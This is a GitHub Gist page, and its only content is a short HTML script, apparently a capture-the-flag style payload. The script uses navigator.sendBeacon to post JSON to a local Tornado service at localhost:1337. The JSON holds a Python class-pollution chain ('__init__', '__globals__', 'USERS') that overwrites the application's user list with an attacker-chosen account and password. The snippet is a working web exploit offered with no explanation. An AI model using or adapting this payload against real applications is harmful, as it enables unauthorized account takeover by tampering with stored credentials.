Skip to content

Instantly share code, notes, and snippets.

@JeffreyShran
Last active November 7, 2025 13:21
Show Gist options
  • Select an option

  • Save JeffreyShran/f128e71260652a5e2c28ad23c429ad5b to your computer and use it in GitHub Desktop.

Select an option

Save JeffreyShran/f128e71260652a5e2c28ad23c429ad5b to your computer and use it in GitHub Desktop.
<script>
navigator.sendBeacon('http://localhost:1337/update_tornado', JSON.stringify({"machine_id": "host-9387", "__init__": {"__globals__": {"USERS": [{"username": "[email protected]", "password": "JEFF"}]}}}));
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment